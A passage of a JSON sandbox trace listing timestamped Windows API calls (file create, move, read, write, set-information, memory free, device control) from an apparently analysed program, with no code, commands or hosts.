"filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,563", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,573", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,583", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,583", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,593", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,593", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,593", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,593", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,593", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,613", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,613", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,624", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,634", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,634", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,634", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,634", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,644", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,644", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,644", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,644", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,644", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,654", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,664", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,674", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,684", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,694", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,694", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,694", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,694", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,694", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,704", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,704", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,704", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,704", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,714", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,714", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,724", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,724", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,724", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,734", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,744", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,744", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,744", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,744", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,744", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,754", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,754", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,754", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,754", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,754", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,754", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,754", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,764", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,764", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,764", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,764", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,764", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,764", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,764", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,764", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,774", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,774", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,774", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,774", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,774", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,784", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,794", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,794", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,794", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,794", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,794", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,804", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,814", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,824", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,824", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,834", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,844", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,854", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,864", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,864", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,874", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,884", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,894", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,904", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,914", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,924", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,934", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,944", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,964", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,964", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,964", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,964", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,964", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,974", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": 